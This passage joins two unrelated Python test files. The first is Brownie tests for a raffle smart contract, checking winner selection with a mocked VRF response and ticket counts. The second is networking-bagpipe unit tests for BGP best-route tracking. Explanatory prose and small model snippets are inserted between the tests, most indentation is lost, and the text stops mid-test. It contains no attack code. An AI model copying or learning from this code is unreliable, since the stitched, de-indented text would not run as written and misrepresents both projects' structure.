claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
requestId = claimTx.events['RequestRandomness']['requestId']
if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
fake_VRF_response(raffle, requestId, 0)
# Assert
Dname, Dbeneficiary, Dwinner, DstartTime, DendTime = raffle.GetRaffleInfo(1)
print(raffle.GetRaffleInfo(1))
assert Dwinner == smart_get_account(1).address
def test_correctly_pick_winner_last():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
# Act
createTx.wait(1)
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 2, {'from': smart_get_account(2), 'value': ticketPrice*2})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 5, {'from': smart_get_account(3), 'value': ticketPrice*5})
enterTx.wait(1)
# Now we trigger the end of the raffle
time.sleep(length)
fund_link(raffle.address, account=smart_get_account(0))
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
requestId = claimTx.events['RequestRandomness']['requestId']
if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
fake_VRF_response(raffle, requestId, 7)
# Assert
Dname, Dbeneficiary, Dwinner, DstartTime, DendTime = raffle.GetRaffleInfo(1)
print(raffle.GetRaffleInfo(1))
assert Dwinner == smart_get_account(3).address
def test_correctly_pick_winner_big():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
# Act
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 2, {'from': smart_get_account(2), 'value': ticketPrice*2})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 5, {'from': smart_get_account(3), 'value': ticketPrice*5})
enterTx.wait(1)
# Now we trigger the end of the raffle
time.sleep(length)
fund_link(raffle.address, account=smart_get_account(0))
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
requestId = claimTx.events['RequestRandomness']['requestId']
if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
fake_VRF_response(raffle, requestId, 800)
# Assert
Dname, Dbeneficiary, Dwinner, DstartTime, DendTime = raffle.GetRaffleInfo(1)
print(raffle.GetRaffleTicketInfo(1))
assert Dwinner == smart_get_account(1).address
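The three winner tests above pin down the selection rule: the VRF value indexes into the flattened ticket list modulo the total ticket count (0 falls on account 1's single ticket, 7 on the last of account 3's five tickets, and 800 % 8 == 0 wraps back to account 1). A pure-Python model of that rule, hypothetical since the real logic lives in the CharityRaffle contract:

```python
def pick_winner(ticket_holders, random_value):
    # ticket_holders: list of (holder, ticket_count); holder i owns the
    # ticket index range [sum(counts[:i]), sum(counts[:i+1])).
    total = sum(count for _, count in ticket_holders)
    index = random_value % total
    for holder, count in ticket_holders:
        if index < count:
            return holder
        index -= count

holders = [("account1", 1), ("account2", 2), ("account3", 5)]
assert pick_winner(holders, 0) == "account1"
assert pick_winner(holders, 7) == "account3"
assert pick_winner(holders, 800) == "account1"  # 800 % 8 == 0
```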
def test_correctly_pick_winner_random():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 2, {'from': smart_get_account(2), 'value': ticketPrice*2})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 5, {'from': smart_get_account(3), 'value': ticketPrice*5})
enterTx.wait(1)
# Now we trigger the end of the raffle
time.sleep(length)
fund_link(raffle.address, account=smart_get_account(0))
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
requestId = claimTx.events['RequestRandomness']['requestId']
if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
value = randint(0,100000)
fake_VRF_response(raffle, requestId, value)
# Assert
Dname, Dbeneficiary, Dwinner, DstartTime, DendTime = raffle.GetRaffleInfo(1)
assert Dwinner != "0x0000000000000000000000000000000000000000"
# Test that the ticket holders are correctly stored
def test_correctly_store_ticket_holders():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 2, {'from': smart_get_account(2), 'value': ticketPrice*2})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 5, {'from': smart_get_account(3), 'value': ticketPrice*5})
enterTx.wait(1)
# Assert
Dname, DstartTime, DendTime, DticketCount, DticketPrice = raffle.GetRaffleTicketInfo(1)
assert DticketCount == 8
assert raffle.GetRaffleBalance(1, smart_get_account(1)) == 1
assert raffle.GetRaffleBalance(1, smart_get_account(2)) == 2
assert raffle.GetRaffleBalance(1, smart_get_account(3)) == 5
# networking_bagpipe/tests/unit/bagpipe_bgp/test_tracker_worker.py (mail2nsrajesh/networking-bagpipe, Apache-2.0)
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# encoding: utf-8
# Copyright 2014 Orange
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module:: test_tracker_worker
:synopsis: a module that defines several test cases for the tracker_worker
module.
In particular, unit tests for TrackerWorker class.
Setup: Run TrackerWorker instance.
TearDown: Stop TrackerWorker instance.
TrackerWorker is in charge of receiving RouteEvents from RouteTableManager.
A RouteEvent contains an event type, ADVERTISE or WITHDRAW, and a RouteEntry.
TrackerWorker should call _new_best_route and/or _best_route_removed if the
new RouteEntry changes the current list of known best routes. That list is
selected via the tracked_entry associated with the new RouteEntry, which is
obtained from _route_2_tracked_entry.
_compare_routes is used to compare two RouteEntry objects.
Unit tests are organized as follow:
TestA: basic tests, advertise several routes with different NLRI and same or
different sources
TestB: same routes (with _compare_routes) announced by different sources
TestC: different routes (with _compare_routes) announced by different
sources, TrackerWorker selects the best route.
TestD: ECMP routes or same routes (with _compare_routes), same source, same
attributes except NextHop
TestE: different routes (with _compare_routes) announced by the same source
with replaced_route not None
"""
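A stripped-down model of the behaviour the docstring describes (hypothetical; it keeps only a single best route per tracked entry and omits ECMP sets, route sources, and the `last` flag):

```python
class MiniTracker:
    def __init__(self, compare):
        self.compare = compare  # returns <0, 0, >0, like _compare_routes
        self.best = {}          # tracked_entry -> current best route
        self.events = []        # records the callback sequence

    def advertise(self, entry, route):
        current = self.best.get(entry)
        if current is None or self.compare(route, current) > 0:
            if current is not None:
                self.events.append(("best_route_removed", entry, current))
            self.best[entry] = route
            self.events.append(("new_best_route", entry, route))

    def withdraw(self, entry, route):
        if self.best.get(entry) == route:
            del self.best[entry]
            self.events.append(("best_route_removed", entry, route))

tracker = MiniTracker(lambda a, b: (a > b) - (b > a))
tracker.advertise("NLRI1", 100)  # first route becomes the best
tracker.advertise("NLRI1", 300)  # better route replaces it
tracker.withdraw("NLRI1", 300)   # last route removed
```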
import copy
import threading
import mock
import testtools
from networking_bagpipe.bagpipe_bgp import engine
from networking_bagpipe.bagpipe_bgp.engine import exa
from networking_bagpipe.bagpipe_bgp.engine import tracker_worker
from networking_bagpipe.bagpipe_bgp.engine import worker
from networking_bagpipe.tests.unit.bagpipe_bgp import base as t
def _test_compare_routes(self, route_a, route_b):
if (route_a.nlri != route_b.nlri or
route_a.afi != route_b.afi or
route_a.safi != route_b.safi):
raise Exception('Bug: compare_routes called with routes having '
'different nlri/afi/safi')
else:
if (route_a.attributes.sameValuesAs(route_b.attributes)):
return 0
else:
lp_a = route_a.attributes[exa.Attribute.CODE.LOCAL_PREF].localpref
nh_a = route_a.attributes[exa.Attribute.CODE.NEXT_HOP].top()
lp_b = route_b.attributes[exa.Attribute.CODE.LOCAL_PREF].localpref
nh_b = route_b.attributes[exa.Attribute.CODE.NEXT_HOP].top()
if nh_a != nh_b and lp_a == lp_b:
# ECMP routes
return 0
else:
return (lp_a > lp_b) - (lp_b > lp_a)
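The final return line above uses the standard Python 3 replacement for the removed `cmp()` builtin. In isolation:

```python
def cmp_like(a, b):
    # Booleans subtract as 1/0, so this yields -1, 0, or 1 -- the
    # three-way result Python 2's cmp() used to return.
    return (a > b) - (b > a)

assert cmp_like(300, 200) == 1    # higher LOCAL_PREF preferred
assert cmp_like(100, 100) == 0
assert cmp_like(100, 200) == -1
```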
class TrackerWorkerThread(tracker_worker.TrackerWorker, threading.Thread):
def __init__(self):
threading.Thread.__init__(self, name='TrackerWorkerThread')
self.daemon = True  # setDaemon() is deprecated
tracker_worker.TrackerWorker.__init__(
self, mock.Mock(), 'TrackerWorker', _test_compare_routes)
def stop(self):
self._please_stop.set()
self._queue.put(worker.STOP_EVENT)
self._stopped()
def _route_2_tracked_entry(self, route):
return route.nlri
# the definitions below are needed because TrackerWorker is an abstract
# class
def _new_best_route(self, entry, route):
pass
def _best_route_removed(self, entry, route, last):
pass
class TestTrackerWorker(testtools.TestCase, t.BaseTestBagPipeBGP):
def setUp(self):
super(TestTrackerWorker, self).setUp()
self.tracker_worker = TrackerWorkerThread()
self.tracker_worker.start()
self.set_event_target_worker(self.tracker_worker)
self._calls = []
def tearDown(self):
super(TestTrackerWorker, self).tearDown()
self.tracker_worker.stop()
self.tracker_worker.join()
def _check_calls(self, call_args_list, expected_list, ordered=True):
# use to check the calls to new_best_route and best_route_removed
# against a list of expected calls
expected_list_copy = []
# clear source field in the routes in expected calls
# because the new_best_route and best_route_removed do not receive
# routes with this field set
for expected in expected_list:
route = copy.copy(expected[1])
route.source = None
if len(expected) == 2:
expected_list_copy.append((expected[0], route))
elif len(expected) == 3:
expected_list_copy.append((expected[0], route, expected[2]))
else:
assert(False)
if not ordered:
expected_list_copy = sorted(expected_list_copy,
key=lambda x: repr(x))
call_args_list = sorted(call_args_list,
key=lambda x: repr(x[0]))
for ((call_args, _), expected) in zip(call_args_list,
expected_list_copy):
self.assertEqual(expected[0], call_args[0], 'Bad prefix')
observed_route_entry = call_args[1]
expected_route_entry = expected[1]
self.assertEqual(expected_route_entry, observed_route_entry)
if len(expected) >= 3:
self.assertEqual(expected[2], call_args[2],
"wrong 'last' flag")
def _call_list(self, method):
def side_effect(*args, **kwargs):
self._append_call(method)
return side_effect
def test_a1_different_nlri_same_source(self):
# A source A advertises and withdraws routes for different NLRI.
# Mock objects
self.tracker_worker._new_best_route = mock.Mock()
self.tracker_worker._best_route_removed = mock.Mock()
# Only 1 source A
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
# Source A advertises a route for NLRI1
route_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source A advertises a route for NLRI2
route_nlri2a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI2, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source A withdraws the route for NLRI1
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source A withdraws the route for NLRI2
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI2, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
self.assertEqual(2, self.tracker_worker._new_best_route.call_count,
'2 new best routes: 1 for NLRI1 and 1 for NLRI2')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route_nlri1a.route_entry),
(t.NLRI2, route_nlri2a.route_entry)])
self.assertEqual(2, self.tracker_worker._best_route_removed.call_count,
'2 old routes removed: 1 for NLRI1 and 1 for NLRI2')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route_nlri1a.route_entry, True),
(t.NLRI2, route_nlri2a.route_entry, True)])
def test_a2_different_nlri_different_source(self):
# 2 sources A and B advertise and withdraw routes for different NLRI.
# Mock objects
self.tracker_worker._new_best_route = mock.Mock()
self.tracker_worker._best_route_removed = mock.Mock()
# 2 sources: A and B
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
# Source A advertises a route for NLRI1
route_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source B advertises a route for NLRI2
route_nlri2B = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI2, [t.RT1, t.RT2],
worker_b, t.NH1, 100)
# Source A withdraws the route for NLRI1
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source B withdraws the route for NLRI2
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI2, [t.RT1, t.RT2],
worker_b, t.NH1, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
self.assertEqual(2, self.tracker_worker._new_best_route.call_count,
'2 new_best_route calls: 1 for NLRI1 and 1 for NLRI2')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route_nlri1a.route_entry),
(t.NLRI2, route_nlri2B.route_entry)])
self.assertEqual(2, self.tracker_worker._best_route_removed.call_count,
'2 best_route_removed calls: 1 for NLRI1 and 1 for '
'NLRI2')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route_nlri1a.route_entry, True),
(t.NLRI2, route_nlri2B.route_entry, True)])
def test_a3_same_nlri_same_source(self):
# A source A advertises the same route for the same NLRI
# Mock objects
self.tracker_worker._new_best_route = mock.Mock()
self.tracker_worker._best_route_removed = mock.Mock()
# 1 source: A
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
# Source A advertises a route for NLRI1
route_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source A advertises the same route for NLRI1
self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
self.assertEqual(1, self.tracker_worker._new_best_route.call_count,
'expected 1 new_best_route call for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route_nlri1a.route_entry),
(t.NLRI1, route_nlri1a.route_entry)])
def test_a4_withdraw_nlri_not_known(self):
# A source A withdraws a route that does not exist.
self.tracker_worker._new_best_route = mock.Mock()
self.tracker_worker._best_route_removed = mock.Mock()
# 1 source: A
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
# Source A withdraws a route for NLRI1 which is not known by
# tracker_worker
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Check calls to _new_best_route and _best_route_removed
self.assertEqual(0, self.tracker_worker._new_best_route.call_count,
'new_best_route should not have been called')
self.assertEqual(0, self.tracker_worker._best_route_removed.call_count,
'best_route_removed should not have been called')
def test_b1_is_the_current_best_route(self):
# The route which is advertised by another source is the current best
# route
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 2 sources: A and B
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
# Source A advertises a route for NLRI1
self._append_call("RE1")
route_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source B advertises the same route for NLRI1
self._append_call("RE2")
route_nlri1B = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 100)
# Source A withdraws the route for NLRI1
self._append_call("RE3")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source B withdraws the route for NLRI1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
self.assertEqual(
1, self.tracker_worker._new_best_route.call_count,
'1 new best route call for NLRI1')
self._check_calls(
self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route_nlri1a.route_entry)])
self.assertEqual(
1, self.tracker_worker._best_route_removed.call_count,
'1 best_route_removed call for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route_nlri1B.route_entry, True)])
expected_calls = ["RE1", t.NBR, "RE2", "RE3", "RE4", t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
def test_b2_is_not_the_current_best_route(self):
# The route which is advertised by another source is not the current
# best route but will become the best route
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 3 sources: A, B and C
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
worker_c = worker.Worker(mock.Mock(), 'worker.Worker-C')
# Source A advertises route1 for NLRI1
self._append_call("RE1")
route1Nlri1 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B advertises route2 for NLRI1 : route1 is better than route2
self._append_call("RE2")
route2Nlri1 = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source C advertises also route2
self._append_call("RE3")
self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_c, t.NH1, 200)
# Source A withdraws route1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", "RE3", "RE4", t.NBR, t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
'2 new best route call for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1Nlri1.route_entry),
(t.NLRI1, route2Nlri1.route_entry)])
self.assertEqual(
1, self.tracker_worker._best_route_removed.call_count,
'1 best_route_removed call for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1Nlri1.route_entry, False)])
def test_c1_route1_best_route(self):
# Route1 is the best route
# Mock objects
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 2 sources : A and B
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B advertises a route2 for NLRI1 with different attributes.
# Route1 is better than Route2
self._append_call("RE2")
route2_nlri1b = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source A withdraws route1 for NLRI1
self._append_call("RE3")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B withdraws route2 for NLRI1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", "RE3",
t.NBR, t.BRR, "RE4", t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
'2 new new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry),
(t.NLRI1, route2_nlri1b.route_entry)])
self.assertEqual(
2, self.tracker_worker._best_route_removed.call_count,
'2 best_route_removed calls for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False),
(t.NLRI1, route2_nlri1b.route_entry, True)])

    def test_c2_route2_best_route(self):
# Route2 is the best route
# Mock objects
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 2 sources: A and B
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source B advertises a route2 for NLRI1. Route2 is better than Route1
self._append_call("RE2")
route2_nlri1b = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source A withdraws route1 for NLRI1
self._append_call("RE3")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", t.NBR, t.BRR, "RE3"]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
            '2 new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry),
(t.NLRI1, route2_nlri1b.route_entry)])
self.assertEqual(
1, self.tracker_worker._best_route_removed.call_count,
'1 best_route_removed call for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False)])

    def test_c3_select_new_best_route_among_several(self):
# When current best route is withdrawn, the new best route should be
# selected among several routes
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 3 sources: A, B and C
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
worker_c = worker.Worker(mock.Mock(), 'worker.Worker-C')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B advertises a route2 for NLRI1. Route1 is better than Route2
self._append_call("RE2")
route2_nlri1b = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source C advertises a route3 for NLRI1. Route2 is better than Route3
self._append_call("RE3")
route3_nlri1c = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_c, t.NH1, 100)
# Source A withdraws route1 for NLRI1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B withdraws route2 for NLRI1
self._append_call("RE5")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_b, t.NH1, 200)
# Source C withdraws route3 for NLRI1
self._append_call("RE6")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_c, t.NH1, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", "RE3",
"RE4", t.NBR, t.BRR, "RE5",
t.NBR, t.BRR, "RE6", t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
3, self.tracker_worker._new_best_route.call_count,
            '3 new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry),
(t.NLRI1, route2_nlri1b.route_entry),
(t.NLRI1, route3_nlri1c.route_entry)])
self.assertEqual(
3, self.tracker_worker._best_route_removed.call_count,
'3 best_route_removed calls for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False),
(t.NLRI1, route2_nlri1b.route_entry, False),
(t.NLRI1, route3_nlri1c.route_entry, True)])

    def test_d1_ecmp_routes(self):
        # ECMP routes are routes advertised by the same worker with the same
        # local preference (LP) but different next hops (NH)
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 1 source: A
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
        # Source A advertises a route2 for NLRI1. route2 compares equal to
        # route1 (per compare_routes), but the next hops are different
self._append_call("RE2")
route2_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH2, 100)
# Source A withdraws route1 for NLRI1
self._append_call("RE3")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source A withdraws route2 for NLRI1
self._append_call("RE4")
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH2, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
expected_calls = ["RE1", t.NBR, "RE2", t.NBR,
"RE3", t.BRR, "RE4", t.BRR]
self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
self.assertEqual(
2, self.tracker_worker._new_best_route.call_count,
            '2 new_best_route calls for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry),
(t.NLRI1, route2_nlri1a.route_entry)])
self.assertEqual(
2, self.tracker_worker._best_route_removed.call_count,
'2 best_route_removed calls for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False),
(t.NLRI1, route2_nlri1a.route_entry, True)])

    def test_e1_replace_br_is_nbr(self):
# Advertise a route that replaces the best route and becomes the new
# best route
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
# 1 source: A
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 200)
# Source A advertises a route2 for NLRI1. Route1 is better than Route2
# BUT Route2 replaces Route1
self._append_call("RE2")
        route2_nlri1a = self._new_route_event(
            engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
            worker_a, t.NH1, 100, route1_nlri1a.route_entry)
        # Check calls and arguments list to _new_best_route and
        # _best_route_removed
        expected_calls = ["RE1", t.NBR, "RE2", t.NBR, t.BRR]
        self.assertEqual(expected_calls, self._calls, 'Wrong call sequence')
        self.assertEqual(
            2, self.tracker_worker._new_best_route.call_count,
            '2 new_best_route calls for NLRI1')
        self._check_calls(self.tracker_worker._new_best_route.call_args_list,
                          [(t.NLRI1, route1_nlri1a.route_entry),
                           (t.NLRI1, route2_nlri1a.route_entry)])
self.assertEqual(
1, self.tracker_worker._best_route_removed.call_count,
'1 best_route_removed call for NLRI1')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route1_nlri1a.route_entry, False)])

    def test_e2_replace_br_is_not_nbr(self):
# Advertise a route that replaces the best route but does not become
# the new best route
self.tracker_worker._new_best_route = mock.Mock(
side_effect=self._call_list(t.NBR))
self.tracker_worker._best_route_removed = mock.Mock(
side_effect=self._call_list(t.BRR))
        # 2 sources: A and B
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
# Source A advertises a route1 for NLRI1
self._append_call("RE1")
route1_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 300)
# Source B advertises a route2. Route1 is better than Route2
